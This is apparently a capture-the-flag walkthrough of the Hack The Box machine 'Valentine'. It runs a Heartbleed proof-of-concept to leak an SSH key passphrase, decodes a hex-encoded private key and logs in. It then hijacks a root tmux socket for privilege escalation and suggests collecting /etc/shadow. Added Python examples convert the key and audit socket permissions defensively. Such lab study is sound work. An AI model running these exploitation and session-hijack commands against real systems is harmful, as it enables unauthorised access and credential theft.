Again, we start with nmap -sC -sV -Pn -p- -oA ./Valentine 10.10.10.79
We've got SSH, HTTP, and HTTPS on their standard ports. Since Gobuster gets testy with self-signed certificates, let's go with Dirbuster on this one. While that's running, and as a guess from the timing and name of the box, let's also run the Heartbleed nmap script to check whether it's vulnerable.
We have officially confirmed that this is a Heartbleed box, and Dirbuster looks to have found a "hype_key" for an SSH login. Running the Heartbleed Python script found here (it took several tries), we finally get a valid base64 string. I eventually ran it as:
sudo python heartbleed-poc.py 10.10.10.79 443 -f /home/kali/Desktop/Valentine/heartpoc.bin -n 35
and then ran strings on the resulting bin file
$ strings heartpoc.bin
<<<SNIPPED FOR BREVITY>>>
And there it is. $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
We have a passphrase. Navigate to https://10.10.10.79/dev/hype_key and copy that to your machine. You can do the same with /dev/notes.txt if you would like. Both are in sub-nodes of the Dirb/Dirbuster node in the CTB file. Now we have to convert hype_key from the hex format it is stored in back to a normal RSA key format (which in this case is just hex to text). We can do that easily:
Paste the HEX string from https://10.10.10.79/dev/hype_key into a hype_key.hex file
$ cat hype_key.hex | xxd -r -p > hype_key
$ cat hype_key (just for verification)
$ chmod 400 hype_key
$ ssh -i hype_key firstname.lastname@example.org
Enter passphrase for key 'hype_key': heartbleedbelievethehype
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
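The hex-to-key step above is one line of xxd, but it is worth seeing what the conversion actually yields and why the passphrase prompt shows up. The following Python script is an added example, not part of the original writeup: it reverses the hex encoding the way xxd -r -p does (ignoring whitespace), checks that the result is a PEM block, reads the PEM headers to tell whether the key is passphrase-protected (the Proc-Type: 4,ENCRYPTED and DEK-Info headers that openssl writes), and writes the key out with mode 0600 so ssh will accept it. The PEM text inside is a constructed placeholder in the shape of hype_key, not the box's key.

```python
import os
import re
import stat
import tempfile

# Constructed sample (not the box's key): a hex-encoded, passphrase-protected
# PEM block in the same shape as hype_key. The base64 body is placeholder text.
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5QUJDREVGR0hJSg==\n"
    "-----END RSA PRIVATE KEY-----\n"
)
SAMPLE_HEX = SAMPLE_PEM.encode("ascii").hex()

PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----\n(.*?)-----END \1-----", re.S)


def hex_to_pem(hex_text):
    """Undo the hex encoding the way `xxd -r -p` does: whitespace is ignored."""
    cleaned = "".join(hex_text.split())
    return bytes.fromhex(cleaned).decode("ascii")


def inspect_pem(pem_text):
    """Return the PEM label and whether the key carries openssl's encryption headers."""
    match = PEM_RE.search(pem_text)
    if match is None:
        raise ValueError("no PEM block found; was the hex converted correctly?")
    label, body = match.group(1), match.group(2)
    headers = {}
    for line in body.split("\n"):
        if ":" not in line:  # headers stop at the blank line before the base64 body
            break
        key, value = line.split(":", 1)
        headers[key.strip()] = value.strip()
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    cipher = headers.get("DEK-Info", "").split(",")[0] or None
    return {"label": label, "encrypted": encrypted, "cipher": cipher}


def write_key(pem_text, path):
    """Write the key owner-only; ssh refuses a private key readable by group/other."""
    with open(path, "w") as fh:
        fh.write(pem_text)
    os.chmod(path, 0o600)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo_write():
    """Round-trip the sample through a temp dir and return the resulting file mode."""
    with tempfile.TemporaryDirectory() as tmp:
        return write_key(hex_to_pem(SAMPLE_HEX), os.path.join(tmp, "hype_key"))


if __name__ == "__main__":
    print(inspect_pem(hex_to_pem(SAMPLE_HEX)))
    print(oct(demo_write()))
```

An unencrypted PEM shows no Proc-Type header at all, which is why a leaked unprotected key needs no second secret; here the passphrase pulled out of the Heartbleed dump was the second piece the key alone did not give up.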
And again, the original hex, the converted key, the nmap outputs, the notes.txt file, and the ps aux output will all be in the CTB file for your enjoyment.
Which brings me to the next part of this box's journey: LinEnum the box. There's a faster way (just run ps aux), but LinEnum (on line 642, to be exact) shows you the EXACT same info as ps aux for the privesc point, and running some form of privesc checker is a good habit to be in. Yes, I know. Reading umpteen million lines of mostly useless info is as boring as listening to grass grow while reading stereo instructions and simultaneously watching paint dry, but TRUST ME, it's better than banging your head against a wall during a real test because you manually checked sudo -l and ps aux and all that jazz but missed a SUID binary or a funky config file permission.
Ok. Now that I'm done ranting: there's a tmux session being run as root! Think of tmux as "screen" but with more features. Personally, I still use screen, but that's because I'm "old" (in terms of IT, anyway, lol) and stubborn in my ways. If it ain't broke, don't fix it, and remember to get off my lawn! Seriously though, tmux allows a session to stay active even if the user has to log off (just like screen does). We should be able to hijack/resume that session with:
tmux -S /.devs/dev_sess
And we've successfully done that. Grab your flags, ifconfig, and /etc/shadow (a good habit to get into if you're wanting to take the OSCP [which I haven't yet]), and you can safely say that this box is done and in the books.
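The reason that socket can be attached to from an unprivileged account is plain file permissions: connecting to a UNIX socket needs write permission on the socket node (and search permission on its directory), so a root-owned tmux socket that is group- or world-writable is a standing privesc. The following Python script is an added example, not from the writeup, and is the check a defender (or a LinEnum-style enumerator) would run: it walks a directory tree, classifies every UNIX socket by owner and mode, and reports the ones reachable by a non-owner. The sockets it creates for its own demo are constructed in a temp directory; dev_sess is only borrowed as a file name.

```python
import os
import socket
import stat
import tempfile


def classify_socket(st_mode, st_uid):
    """Describe one directory entry if it is a UNIX socket, else return None.

    connect() needs write permission on the socket node, so group/other write
    bits on a root-owned socket mean someone other than root can attach.
    """
    if not stat.S_ISSOCK(st_mode):
        return None
    mode = stat.S_IMODE(st_mode)
    shared_write = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    return {
        "mode": oct(mode),
        "owner_uid": st_uid,
        "reachable_by_others": shared_write,
        "root_owned": st_uid == 0,
    }


def audit_sockets(root):
    """Walk `root` and list every UNIX socket a non-owner could connect to."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:  # os.walk reports sockets among the non-directory entries
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the sweep
            info = classify_socket(st.st_mode, st.st_uid)
            if info and info["reachable_by_others"]:
                info["path"] = path
                findings.append(info)
    return sorted(findings, key=lambda f: f["path"])


def make_fixture(root):
    """Constructed fixture: two sockets under `root`, one loose (660) and one tight (600)."""
    paths = {}
    for name, mode in (("dev_sess", 0o660), ("private_sess", 0o600)):
        path = os.path.join(root, name)
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(path)  # creates the socket node; it stays on disk after close()
        s.close()
        os.chmod(path, mode)
        paths[name] = path
    return paths


def demo_audit():
    """Build the fixture in a temp dir and return the names the audit flags."""
    with tempfile.TemporaryDirectory() as root:
        make_fixture(root)
        return [os.path.basename(f["path"]) for f in audit_sockets(root)]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        make_fixture(root)
        for finding in audit_sockets(root):
            tag = "root-owned" if finding["root_owned"] else "uid %d" % finding["owner_uid"]
            print(finding["path"], finding["mode"], tag)
```

Run against / on a real host the sweep is slow and noisy, so in practice you point it at the places tmux and screen keep their sockets (/tmp/tmux-*, /run, and anywhere odd like the /.devs directory here). The fix on the host side is the mirror image of the attack: keep root's tmux sockets 0600 in a directory only root can search, or don't leave a root session parked on a shared socket at all.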